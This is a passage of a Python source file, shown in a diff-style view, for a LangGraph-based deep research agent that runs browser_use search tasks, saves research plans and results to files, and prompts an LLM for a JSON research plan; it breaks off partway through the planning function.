|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Deep Research Agent
|
| 3 |
+
==============================================================
|
| 4 |
+
|
| 5 |
+
Advanced research agent for comprehensive data gathering and analysis.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import json
|
| 14 |
+
import logging
|
| 15 |
+
import os
|
| 16 |
+
import threading
|
| 17 |
+
import uuid
|
| 18 |
+
from pathlib import Path
|
| 19 |
+
from typing import Any, Dict, List, Optional, TypedDict
|
| 20 |
+
|
| 21 |
+
# Disable telemetry
|
| 22 |
+
os.environ["BROWSER_USE_TELEMETRY"] = "false"
|
| 23 |
+
os.environ["BROWSER_USE_DISABLE_TELEMETRY"] = "true"
|
| 24 |
+
|
| 25 |
+
from browser_use.browser.browser import BrowserConfig
|
| 26 |
+
from langchain_community.tools.file_management import (
|
| 27 |
+
ListDirectoryTool,
|
| 28 |
+
ReadFileTool,
|
| 29 |
+
WriteFileTool,
|
| 30 |
+
)
|
| 31 |
+
|
| 32 |
+
# Langchain imports
|
| 33 |
+
from langchain_core.messages import (
|
| 34 |
+
AIMessage,
|
| 35 |
+
BaseMessage,
|
| 36 |
+
HumanMessage,
|
| 37 |
+
SystemMessage,
|
| 38 |
+
ToolMessage,
|
| 39 |
+
)
|
| 40 |
+
from langchain_core.prompts import ChatPromptTemplate
|
| 41 |
+
from langchain_core.tools import StructuredTool, Tool
|
| 42 |
+
|
| 43 |
+
# Langgraph imports
|
| 44 |
+
from langgraph.graph import StateGraph
|
| 45 |
+
from pydantic import BaseModel, Field
|
| 46 |
+
|
| 47 |
+
from browser_use.browser.context import BrowserContextConfig
|
| 48 |
+
|
| 49 |
+
from src.agent.browser_use.browser_use_agent import BrowserUseAgent
|
| 50 |
+
from src.browser.custom_browser import CustomBrowser
|
| 51 |
+
from src.controller.custom_controller import CustomController
|
| 52 |
+
from src.utils.mcp_client import setup_mcp_client_and_tools
|
| 53 |
+
|
| 54 |
+
logger = logging.getLogger(__name__)
|
| 55 |
+
|
| 56 |
+
# Constants
|
| 57 |
+
REPORT_FILENAME = "report.md"
|
| 58 |
+
PLAN_FILENAME = "research_plan.md"
|
| 59 |
+
SEARCH_INFO_FILENAME = "search_info.json"
|
| 60 |
+
|
| 61 |
+
_AGENT_STOP_FLAGS = {}
|
| 62 |
+
_BROWSER_AGENT_INSTANCES = {}
|
| 63 |
+
|
| 64 |
+
|
| 65 |
+
async def run_single_browser_task(
|
| 66 |
+
task_query: str,
|
| 67 |
+
task_id: str,
|
| 68 |
+
llm: Any, # Pass the main LLM
|
| 69 |
+
browser_config: Dict[str, Any],
|
| 70 |
+
stop_event: threading.Event,
|
| 71 |
+
use_vision: bool = False,
|
| 72 |
+
) -> Dict[str, Any]:
|
| 73 |
+
"""
|
| 74 |
+
Runs a single BrowserUseAgent task.
|
| 75 |
+
Manages browser creation and closing for this specific task.
|
| 76 |
+
"""
|
| 77 |
+
if not BrowserUseAgent:
|
| 78 |
+
return {
|
| 79 |
+
"query": task_query,
|
| 80 |
+
"error": "BrowserUseAgent components not available.",
|
| 81 |
+
}
|
| 82 |
+
|
| 83 |
+
# --- Browser Setup ---
|
| 84 |
+
# These should ideally come from the main agent's config
|
| 85 |
+
headless = browser_config.get("headless", False)
|
| 86 |
+
window_w = browser_config.get("window_width", 1280)
|
| 87 |
+
window_h = browser_config.get("window_height", 1100)
|
| 88 |
+
browser_user_data_dir = browser_config.get("user_data_dir", None)
|
| 89 |
+
use_own_browser = browser_config.get("use_own_browser", False)
|
| 90 |
+
browser_binary_path = browser_config.get("browser_binary_path", None)
|
| 91 |
+
wss_url = browser_config.get("wss_url", None)
|
| 92 |
+
cdp_url = browser_config.get("cdp_url", None)
|
| 93 |
+
disable_security = browser_config.get("disable_security", False)
|
| 94 |
+
|
| 95 |
+
bu_browser = None
|
| 96 |
+
bu_browser_context = None
|
| 97 |
+
try:
|
| 98 |
+
logger.info(f"Starting browser task for query: {task_query}")
|
| 99 |
+
extra_args = []
|
| 100 |
+
if use_own_browser:
|
| 101 |
+
browser_binary_path = os.getenv("BROWSER_PATH", None) or browser_binary_path
|
| 102 |
+
if browser_binary_path == "":
|
| 103 |
+
browser_binary_path = None
|
| 104 |
+
browser_user_data = browser_user_data_dir or os.getenv("BROWSER_USER_DATA", None)
|
| 105 |
+
if browser_user_data:
|
| 106 |
+
extra_args += [f"--user-data-dir={browser_user_data}"]
|
| 107 |
+
else:
|
| 108 |
+
browser_binary_path = None
|
| 109 |
+
|
| 110 |
+
bu_browser = CustomBrowser(
|
| 111 |
+
config=BrowserConfig(
|
| 112 |
+
headless=headless,
|
| 113 |
+
browser_binary_path=browser_binary_path,
|
| 114 |
+
extra_browser_args=extra_args,
|
| 115 |
+
wss_url=wss_url,
|
| 116 |
+
cdp_url=cdp_url,
|
| 117 |
+
new_context_config=BrowserContextConfig(
|
| 118 |
+
window_width=window_w,
|
| 119 |
+
window_height=window_h,
|
| 120 |
+
)
|
| 121 |
+
)
|
| 122 |
+
)
|
| 123 |
+
|
| 124 |
+
context_config = BrowserContextConfig(
|
| 125 |
+
save_downloads_path="./tmp/downloads",
|
| 126 |
+
window_height=window_h,
|
| 127 |
+
window_width=window_w,
|
| 128 |
+
force_new_context=True,
|
| 129 |
+
)
|
| 130 |
+
bu_browser_context = await bu_browser.new_context(config=context_config)
|
| 131 |
+
|
| 132 |
+
# Simple controller example, replace with your actual implementation if needed
|
| 133 |
+
bu_controller = CustomController()
|
| 134 |
+
|
| 135 |
+
# Construct the task prompt for BrowserUseAgent
|
| 136 |
+
# Instruct it to find specific info and return title/URL
|
| 137 |
+
bu_task_prompt = f"""
|
| 138 |
+
Research Task: {task_query}
|
| 139 |
+
Objective: Find relevant information answering the query.
|
| 140 |
+
Output Requirements: For each relevant piece of information found, please provide:
|
| 141 |
+
1. A concise summary of the information.
|
| 142 |
+
2. The title of the source page or document.
|
| 143 |
+
3. The URL of the source.
|
| 144 |
+
Focus on accuracy and relevance. Avoid irrelevant details.
|
| 145 |
+
PDF cannot directly extract _content, please try to download first, then using read_file, if you can't save or read, please try other methods.
|
| 146 |
+
"""
|
| 147 |
+
|
| 148 |
+
bu_agent_instance = BrowserUseAgent(
|
| 149 |
+
task=bu_task_prompt,
|
| 150 |
+
llm=llm, # Use the passed LLM
|
| 151 |
+
browser=bu_browser,
|
| 152 |
+
browser_context=bu_browser_context,
|
| 153 |
+
controller=bu_controller,
|
| 154 |
+
use_vision=use_vision,
|
| 155 |
+
source="webui",
|
| 156 |
+
)
|
| 157 |
+
|
| 158 |
+
# Store instance for potential stop() call
|
| 159 |
+
task_key = f"{task_id}_{uuid.uuid4()}"
|
| 160 |
+
_BROWSER_AGENT_INSTANCES[task_key] = bu_agent_instance
|
| 161 |
+
|
| 162 |
+
# --- Run with Stop Check ---
|
| 163 |
+
# BrowserUseAgent needs to internally check a stop signal or have a stop method.
|
| 164 |
+
# We simulate checking before starting and assume `run` might be interruptible
|
| 165 |
+
# or have its own stop mechanism we can trigger via bu_agent_instance.stop().
|
| 166 |
+
if stop_event.is_set():
|
| 167 |
+
logger.info(f"Browser task for '{task_query}' cancelled before start.")
|
| 168 |
+
return {"query": task_query, "result": None, "status": "cancelled"}
|
| 169 |
+
|
| 170 |
+
# The run needs to be awaitable and ideally accept a stop signal or have a .stop() method
|
| 171 |
+
# result = await bu_agent_instance.run(max_steps=max_steps) # Add max_steps if applicable
|
| 172 |
+
# Let's assume a simplified run for now
|
| 173 |
+
logger.info(f"Running BrowserUseAgent for: {task_query}")
|
| 174 |
+
result = await bu_agent_instance.run() # Assuming run is the main method
|
| 175 |
+
logger.info(f"BrowserUseAgent finished for: {task_query}")
|
| 176 |
+
|
| 177 |
+
final_data = result.final_result()
|
| 178 |
+
|
| 179 |
+
if stop_event.is_set():
|
| 180 |
+
logger.info(f"Browser task for '{task_query}' stopped during execution.")
|
| 181 |
+
return {"query": task_query, "result": final_data, "status": "stopped"}
|
| 182 |
+
else:
|
| 183 |
+
logger.info(f"Browser result for '{task_query}': {final_data}")
|
| 184 |
+
return {"query": task_query, "result": final_data, "status": "completed"}
|
| 185 |
+
|
| 186 |
+
except Exception as e:
|
| 187 |
+
logger.error(
|
| 188 |
+
f"Error during browser task for query '{task_query}': {e}", exc_info=True
|
| 189 |
+
)
|
| 190 |
+
return {"query": task_query, "error": str(e), "status": "failed"}
|
| 191 |
+
finally:
|
| 192 |
+
if bu_browser_context:
|
| 193 |
+
try:
|
| 194 |
+
await bu_browser_context.close()
|
| 195 |
+
bu_browser_context = None
|
| 196 |
+
logger.info("Closed browser context.")
|
| 197 |
+
except Exception as e:
|
| 198 |
+
logger.error(f"Error closing browser context: {e}")
|
| 199 |
+
if bu_browser:
|
| 200 |
+
try:
|
| 201 |
+
await bu_browser.close()
|
| 202 |
+
bu_browser = None
|
| 203 |
+
logger.info("Closed browser.")
|
| 204 |
+
except Exception as e:
|
| 205 |
+
logger.error(f"Error closing browser: {e}")
|
| 206 |
+
|
| 207 |
+
if task_key in _BROWSER_AGENT_INSTANCES:
|
| 208 |
+
del _BROWSER_AGENT_INSTANCES[task_key]
|
| 209 |
+
|
| 210 |
+
|
| 211 |
+
class BrowserSearchInput(BaseModel):
|
| 212 |
+
queries: List[str] = Field(
|
| 213 |
+
description="List of distinct search queries to find information relevant to the research task."
|
| 214 |
+
)
|
| 215 |
+
|
| 216 |
+
|
| 217 |
+
async def _run_browser_search_tool(
|
| 218 |
+
queries: List[str],
|
| 219 |
+
task_id: str, # Injected dependency
|
| 220 |
+
llm: Any, # Injected dependency
|
| 221 |
+
browser_config: Dict[str, Any],
|
| 222 |
+
stop_event: threading.Event,
|
| 223 |
+
max_parallel_browsers: int = 1,
|
| 224 |
+
) -> List[Dict[str, Any]]:
|
| 225 |
+
"""
|
| 226 |
+
Internal function to execute parallel browser searches based on LLM-provided queries.
|
| 227 |
+
Handles concurrency and stop signals.
|
| 228 |
+
"""
|
| 229 |
+
|
| 230 |
+
# Limit queries just in case LLM ignores the description
|
| 231 |
+
queries = queries[:max_parallel_browsers]
|
| 232 |
+
logger.info(
|
| 233 |
+
f"[Browser Tool {task_id}] Running search for {len(queries)} queries: {queries}"
|
| 234 |
+
)
|
| 235 |
+
|
| 236 |
+
results = []
|
| 237 |
+
semaphore = asyncio.Semaphore(max_parallel_browsers)
|
| 238 |
+
|
| 239 |
+
async def task_wrapper(query):
|
| 240 |
+
async with semaphore:
|
| 241 |
+
if stop_event.is_set():
|
| 242 |
+
logger.info(
|
| 243 |
+
f"[Browser Tool {task_id}] Skipping task due to stop signal: {query}"
|
| 244 |
+
)
|
| 245 |
+
return {"query": query, "result": None, "status": "cancelled"}
|
| 246 |
+
# Pass necessary injected configs and the stop event
|
| 247 |
+
return await run_single_browser_task(
|
| 248 |
+
query,
|
| 249 |
+
task_id,
|
| 250 |
+
llm, # Pass the main LLM (or a dedicated one if needed)
|
| 251 |
+
browser_config,
|
| 252 |
+
stop_event,
|
| 253 |
+
# use_vision could be added here if needed
|
| 254 |
+
)
|
| 255 |
+
|
| 256 |
+
tasks = [task_wrapper(query) for query in queries]
|
| 257 |
+
search_results = await asyncio.gather(*tasks, return_exceptions=True)
|
| 258 |
+
|
| 259 |
+
processed_results = []
|
| 260 |
+
for i, res in enumerate(search_results):
|
| 261 |
+
query = queries[i] # Get corresponding query
|
| 262 |
+
if isinstance(res, Exception):
|
| 263 |
+
logger.error(
|
| 264 |
+
f"[Browser Tool {task_id}] Gather caught exception for query '{query}': {res}",
|
| 265 |
+
exc_info=True,
|
| 266 |
+
)
|
| 267 |
+
processed_results.append(
|
| 268 |
+
{"query": query, "error": str(res), "status": "failed"}
|
| 269 |
+
)
|
| 270 |
+
elif isinstance(res, dict):
|
| 271 |
+
processed_results.append(res)
|
| 272 |
+
else:
|
| 273 |
+
logger.error(
|
| 274 |
+
f"[Browser Tool {task_id}] Unexpected result type for query '{query}': {type(res)}"
|
| 275 |
+
)
|
| 276 |
+
processed_results.append(
|
| 277 |
+
{"query": query, "error": "Unexpected result type", "status": "failed"}
|
| 278 |
+
)
|
| 279 |
+
|
| 280 |
+
logger.info(
|
| 281 |
+
f"[Browser Tool {task_id}] Finished search. Results count: {len(processed_results)}"
|
| 282 |
+
)
|
| 283 |
+
return processed_results
|
| 284 |
+
|
| 285 |
+
|
| 286 |
+
def create_browser_search_tool(
|
| 287 |
+
llm: Any,
|
| 288 |
+
browser_config: Dict[str, Any],
|
| 289 |
+
task_id: str,
|
| 290 |
+
stop_event: threading.Event,
|
| 291 |
+
max_parallel_browsers: int = 1,
|
| 292 |
+
) -> StructuredTool:
|
| 293 |
+
"""Factory function to create the browser search tool with necessary dependencies."""
|
| 294 |
+
# Use partial to bind the dependencies that aren't part of the LLM call arguments
|
| 295 |
+
from functools import partial
|
| 296 |
+
|
| 297 |
+
bound_tool_func = partial(
|
| 298 |
+
_run_browser_search_tool,
|
| 299 |
+
task_id=task_id,
|
| 300 |
+
llm=llm,
|
| 301 |
+
browser_config=browser_config,
|
| 302 |
+
stop_event=stop_event,
|
| 303 |
+
max_parallel_browsers=max_parallel_browsers,
|
| 304 |
+
)
|
| 305 |
+
|
| 306 |
+
return StructuredTool.from_function(
|
| 307 |
+
coroutine=bound_tool_func,
|
| 308 |
+
name="parallel_browser_search",
|
| 309 |
+
description=f"""Use this tool to actively search the web for information related to a specific research task or question.
|
| 310 |
+
It runs up to {max_parallel_browsers} searches in parallel using a browser agent for better results than simple scraping.
|
| 311 |
+
Provide a list of distinct search queries(up to {max_parallel_browsers}) that are likely to yield relevant information.""",
|
| 312 |
+
args_schema=BrowserSearchInput,
|
| 313 |
+
)
|
| 314 |
+
|
| 315 |
+
|
| 316 |
+
# --- Langgraph State Definition ---
|
| 317 |
+
|
| 318 |
+
|
| 319 |
+
class ResearchTaskItem(TypedDict):
|
| 320 |
+
# step: int # Maybe step within category, or just implicit by order
|
| 321 |
+
task_description: str
|
| 322 |
+
status: str # "pending", "completed", "failed"
|
| 323 |
+
queries: Optional[List[str]]
|
| 324 |
+
result_summary: Optional[str]
|
| 325 |
+
|
| 326 |
+
|
| 327 |
+
class ResearchCategoryItem(TypedDict):
|
| 328 |
+
category_name: str
|
| 329 |
+
tasks: List[ResearchTaskItem]
|
| 330 |
+
# Optional: category_status: str # Could be "pending", "in_progress", "completed"
|
| 331 |
+
|
| 332 |
+
|
| 333 |
+
class DeepResearchState(TypedDict):
|
| 334 |
+
task_id: str
|
| 335 |
+
topic: str
|
| 336 |
+
research_plan: List[ResearchCategoryItem] # CHANGED
|
| 337 |
+
search_results: List[Dict[str, Any]]
|
| 338 |
+
llm: Any
|
| 339 |
+
tools: List[Tool]
|
| 340 |
+
output_dir: Path
|
| 341 |
+
browser_config: Dict[str, Any]
|
| 342 |
+
final_report: Optional[str]
|
| 343 |
+
current_category_index: int
|
| 344 |
+
current_task_index_in_category: int
|
| 345 |
+
stop_requested: bool
|
| 346 |
+
error_message: Optional[str]
|
| 347 |
+
messages: List[BaseMessage]
|
| 348 |
+
|
| 349 |
+
|
| 350 |
+
# --- Langgraph Nodes ---
|
| 351 |
+
|
| 352 |
+
|
| 353 |
+
def _load_previous_state(task_id: str, output_dir: str) -> Dict[str, Any]:
|
| 354 |
+
state_updates = {}
|
| 355 |
+
plan_file = os.path.join(output_dir, PLAN_FILENAME)
|
| 356 |
+
search_file = os.path.join(output_dir, SEARCH_INFO_FILENAME)
|
| 357 |
+
|
| 358 |
+
loaded_plan: List[ResearchCategoryItem] = []
|
| 359 |
+
next_cat_idx, next_task_idx = 0, 0
|
| 360 |
+
found_pending = False
|
| 361 |
+
|
| 362 |
+
if os.path.exists(plan_file):
|
| 363 |
+
try:
|
| 364 |
+
with open(plan_file, "r", encoding="utf-8") as f:
|
| 365 |
+
current_category: Optional[ResearchCategoryItem] = None
|
| 366 |
+
lines = f.readlines()
|
| 367 |
+
cat_counter = 0
|
| 368 |
+
task_counter_in_cat = 0
|
| 369 |
+
|
| 370 |
+
for line_num, line_content in enumerate(lines):
|
| 371 |
+
line = line_content.strip()
|
| 372 |
+
if line.startswith("## "): # Category
|
| 373 |
+
if current_category: # Save previous category
|
| 374 |
+
loaded_plan.append(current_category)
|
| 375 |
+
if not found_pending: # If previous category was all done, advance cat counter
|
| 376 |
+
cat_counter += 1
|
| 377 |
+
task_counter_in_cat = 0
|
| 378 |
+
category_name = line[line.find(" "):].strip() # Get text after "## X. "
|
| 379 |
+
current_category = ResearchCategoryItem(category_name=category_name, tasks=[])
|
| 380 |
+
elif (line.startswith("- [ ]") or line.startswith("- [x]") or line.startswith(
|
| 381 |
+
"- [-]")) and current_category: # Task
|
| 382 |
+
status = "pending"
|
| 383 |
+
if line.startswith("- [x]"):
|
| 384 |
+
status = "completed"
|
| 385 |
+
elif line.startswith("- [-]"):
|
| 386 |
+
status = "failed"
|
| 387 |
+
|
| 388 |
+
task_desc = line[5:].strip()
|
| 389 |
+
current_category["tasks"].append(
|
| 390 |
+
ResearchTaskItem(task_description=task_desc, status=status, queries=None,
|
| 391 |
+
result_summary=None)
|
| 392 |
+
)
|
| 393 |
+
if status == "pending" and not found_pending:
|
| 394 |
+
next_cat_idx = cat_counter
|
| 395 |
+
next_task_idx = task_counter_in_cat
|
| 396 |
+
found_pending = True
|
| 397 |
+
if not found_pending: # only increment if previous tasks were completed/failed
|
| 398 |
+
task_counter_in_cat += 1
|
| 399 |
+
|
| 400 |
+
if current_category: # Append last category
|
| 401 |
+
loaded_plan.append(current_category)
|
| 402 |
+
|
| 403 |
+
if loaded_plan:
|
| 404 |
+
state_updates["research_plan"] = loaded_plan
|
| 405 |
+
if not found_pending and loaded_plan: # All tasks were completed or failed
|
| 406 |
+
next_cat_idx = len(loaded_plan) # Points beyond the last category
|
| 407 |
+
next_task_idx = 0
|
| 408 |
+
state_updates["current_category_index"] = next_cat_idx
|
| 409 |
+
state_updates["current_task_index_in_category"] = next_task_idx
|
| 410 |
+
logger.info(
|
| 411 |
+
f"Loaded hierarchical research plan from {plan_file}. "
|
| 412 |
+
f"Next task: Category {next_cat_idx}, Task {next_task_idx} in category."
|
| 413 |
+
)
|
| 414 |
+
else:
|
| 415 |
+
logger.warning(f"Plan file {plan_file} was empty or malformed.")
|
| 416 |
+
|
| 417 |
+
except Exception as e:
|
| 418 |
+
logger.error(f"Failed to load or parse research plan {plan_file}: {e}", exc_info=True)
|
| 419 |
+
state_updates["error_message"] = f"Failed to load research plan: {e}"
|
| 420 |
+
else:
|
| 421 |
+
logger.info(f"Plan file {plan_file} not found. Will start fresh.")
|
| 422 |
+
|
| 423 |
+
if os.path.exists(search_file):
|
| 424 |
+
try:
|
| 425 |
+
with open(search_file, "r", encoding="utf-8") as f:
|
| 426 |
+
state_updates["search_results"] = json.load(f)
|
| 427 |
+
logger.info(f"Loaded search results from {search_file}")
|
| 428 |
+
except Exception as e:
|
| 429 |
+
logger.error(f"Failed to load search results {search_file}: {e}")
|
| 430 |
+
state_updates["error_message"] = (
|
| 431 |
+
state_updates.get("error_message", "") + f" Failed to load search results: {e}").strip()
|
| 432 |
+
|
| 433 |
+
return state_updates
|
| 434 |
+
|
| 435 |
+
|
| 436 |
+
def _save_plan_to_md(plan: List[ResearchCategoryItem], output_dir: str):
|
| 437 |
+
plan_file = os.path.join(output_dir, PLAN_FILENAME)
|
| 438 |
+
try:
|
| 439 |
+
with open(plan_file, "w", encoding="utf-8") as f:
|
| 440 |
+
f.write(f"# Research Plan\n\n")
|
| 441 |
+
for cat_idx, category in enumerate(plan):
|
| 442 |
+
f.write(f"## {cat_idx + 1}. {category['category_name']}\n\n")
|
| 443 |
+
for task_idx, task in enumerate(category['tasks']):
|
| 444 |
+
marker = "- [x]" if task["status"] == "completed" else "- [ ]" if task[
|
| 445 |
+
"status"] == "pending" else "- [-]" # [-] for failed
|
| 446 |
+
f.write(f" {marker} {task['task_description']}\n")
|
| 447 |
+
f.write("\n")
|
| 448 |
+
logger.info(f"Hierarchical research plan saved to {plan_file}")
|
| 449 |
+
except Exception as e:
|
| 450 |
+
logger.error(f"Failed to save research plan to {plan_file}: {e}")
|
| 451 |
+
|
| 452 |
+
|
| 453 |
+
def _save_search_results_to_json(results: List[Dict[str, Any]], output_dir: str):
|
| 454 |
+
"""Appends or overwrites search results to a JSON file."""
|
| 455 |
+
search_file = os.path.join(output_dir, SEARCH_INFO_FILENAME)
|
| 456 |
+
try:
|
| 457 |
+
# Simple overwrite for now, could be append
|
| 458 |
+
with open(search_file, "w", encoding="utf-8") as f:
|
| 459 |
+
json.dump(results, f, indent=2, ensure_ascii=False)
|
| 460 |
+
logger.info(f"Search results saved to {search_file}")
|
| 461 |
+
except Exception as e:
|
| 462 |
+
logger.error(f"Failed to save search results to {search_file}: {e}")
|
| 463 |
+
|
| 464 |
+
|
| 465 |
+
def _save_report_to_md(report: str, output_dir: Path):
|
| 466 |
+
"""Saves the final report to a markdown file."""
|
| 467 |
+
report_file = os.path.join(output_dir, REPORT_FILENAME)
|
| 468 |
+
try:
|
| 469 |
+
with open(report_file, "w", encoding="utf-8") as f:
|
| 470 |
+
f.write(report)
|
| 471 |
+
logger.info(f"Final report saved to {report_file}")
|
| 472 |
+
except Exception as e:
|
| 473 |
+
logger.error(f"Failed to save final report to {report_file}: {e}")
|
| 474 |
+
|
| 475 |
+
|
| 476 |
+
async def planning_node(state: DeepResearchState) -> Dict[str, Any]:
|
| 477 |
+
logger.info("--- Entering Planning Node ---")
|
| 478 |
+
if state.get("stop_requested"):
|
| 479 |
+
logger.info("Stop requested, skipping planning.")
|
| 480 |
+
return {"stop_requested": True}
|
| 481 |
+
|
| 482 |
+
llm = state["llm"]
|
| 483 |
+
topic = state["topic"]
|
| 484 |
+
existing_plan = state.get("research_plan")
|
| 485 |
+
output_dir = state["output_dir"]
|
| 486 |
+
|
| 487 |
+
if existing_plan and (
|
| 488 |
+
state.get("current_category_index", 0) > 0 or state.get("current_task_index_in_category", 0) > 0):
|
| 489 |
+
logger.info("Resuming with existing plan.")
|
| 490 |
+
_save_plan_to_md(existing_plan, output_dir) # Ensure it's saved initially
|
| 491 |
+
# current_category_index and current_task_index_in_category should be set by _load_previous_state
|
| 492 |
+
return {"research_plan": existing_plan}
|
| 493 |
+
|
| 494 |
+
logger.info(f"Generating new research plan for topic: {topic}")
|
| 495 |
+
|
| 496 |
+
prompt_text = f"""You are a meticulous research assistant. Your goal is to create a hierarchical research plan to thoroughly investigate the topic: "{topic}".
|
| 497 |
+
The plan should be structured into several main research categories. Each category should contain a list of specific, actionable research tasks or questions.
|
| 498 |
+
Format the output as a JSON list of objects. Each object represents a research category and should have:
|
| 499 |
+
1. "category_name": A string for the name of the research category.
|
| 500 |
+
2. "tasks": A list of strings, where each string is a specific research task for that category.
|
| 501 |
+
|
| 502 |
+
Example JSON Output:
|
| 503 |
+
[
|
| 504 |
+
{{
|
| 505 |
+
"category_name": "Understanding Core Concepts and Definitions",
|
| 506 |
+
"tasks": [
|
| 507 |
+
"Define the primary terminology associated with '{topic}'.",
|
| 508 |
+
"Identify the fundamental principles and theories underpinning '{topic}'."
|
| 509 |
+
]
|
| 510 |
+
}},
|
| 511 |
+
{{
|
| 512 |
+
"category_name": "Historical Development and Key Milestones",
|
| 513 |
+
"tasks": [
|
| 514 |
+
"Trace the historical evolution of '{topic}'.",
|
| 515 |
+
"Identify key figures, events, or breakthroughs in the development of '{topic}'."
|
| 516 |
+
]
|
| 517 |
+
}},
|
| 518 |
+
{{
|
| 519 |
+
"category_name": "Current State-of-the-Art and Applications",
|
| 520 |
+
"tasks": [
|
| 521 |
+
"Analyze the current advancements and prominent applications of '{topic}'.",
|
| 522 |
+
"Investigate ongoing research and active areas of development related to '{topic}'."
|
| 523 |
+
]
|
| 524 |
+
}},
|
| 525 |
+
{{
|
| 526 |
+
"category_name": "Challenges, Limitations, and Future Outlook",
|
| 527 |
+
"tasks": [
|
| 528 |
+
"Identify the major challenges and limitations currently facing '{topic}'.",
|
| 529 |
+
"Explore potential future trends, ethical considerations, and societal impacts of '{topic}'."
|
| 530 |
+
]
|
| 531 |
+
}}
|
| 532 |
+
]
|
| 533 |
+
|
| 534 |
+
Generate a plan with 3-10 categories, and 2-6 tasks per category for the topic: "{topic}" according to the complexity of the topic.
|
| 535 |
+
Ensure the output is a valid JSON array.
|
| 536 |
+
"""
|
| 537 |
+
messages = [
|
| 538 |
+
SystemMessage(content="You are a research planning assistant outputting JSON."),
|
| 539 |
+
HumanMessage(content=prompt_text)
|
| 540 |
+
]
|
| 541 |
+
|
| 542 |
+
try:
|
| 543 |
+
response = await llm.ainvoke(messages)
|
| 544 |
+
raw_content = response.content
|
| 545 |
+
# The LLM might wrap the JSON in backticks
|
| 546 |
+
if raw_content.strip().startswith("```json"):
|
| 547 |
+
raw_content = raw_content.strip()[7:-3].strip()
|
| 548 |
+
elif raw_content.strip().startswith("```"):
|
| 549 |
+
raw_content = raw_content.strip()[3:-3].strip()
|
| 550 |
+
|
| 551 |
+
logger.debug(f"LLM response for plan: {raw_content}")
|
| 552 |
+
parsed_plan_from_llm = json.loads(raw_content)
|
| 553 |
+
|
| 554 |
+
new_plan: List[ResearchCategoryItem] = []
|
| 555 |
+
for cat_idx, category_data in enumerate(parsed_plan_from_llm):
|
| 556 |
+
if not isinstance(category_data,
|
| 557 |
+
dict) or "category_name" not in category_data or "tasks" not in category_data:
|
| 558 |
+
logger.warning(f"Skipping invalid category data: {category_data}")
|
| 559 |
+
continue
|
| 560 |
+
|
| 561 |
+
tasks: List[ResearchTaskItem] = []
|
| 562 |
+
for task_idx, task_desc in enumerate(category_data["tasks"]):
|
| 563 |
+
if isinstance(task_desc, str):
|
| 564 |
+
tasks.append(
|
| 565 |
+
ResearchTaskItem(
|
| 566 |
+
task_description=task_desc,
|
| 567 |
+
status="pending",
|
| 568 |
+
queries=None,
|
| 569 |
+
result_summary=None,
|
| 570 |
+
)
|
| 571 |
+
)
|
| 572 |
+
else: # Sometimes LLM puts tasks as {"task": "description"}
|
| 573 |
+
if isinstance(task_desc, dict) and "task_description" in task_desc:
|
| 574 |
+
tasks.append(
|
| 575 |
+
ResearchTaskItem(
|
| 576 |
+
task_description=task_desc["task_description"],
|
| 577 |
+
status="pending",
|
| 578 |
+
queries=None,
|
| 579 |
+
result_summary=None,
|
| 580 |
+
)
|
| 581 |
+
)
|
| 582 |
+
elif isinstance(task_desc, dict) and "task" in task_desc: # common LLM mistake
|
| 583 |
+
tasks.append(
|
| 584 |
+
ResearchTaskItem(
|
| 585 |
+
task_description=task_desc["task"],
|
| 586 |
+
status="pending",
|
| 587 |
+
queries=None,
|
| 588 |
+
result_summary=None,
|
| 589 |
+
)
|
| 590 |
+
)
|
| 591 |
+
else:
|
| 592 |
+
logger.warning(
|
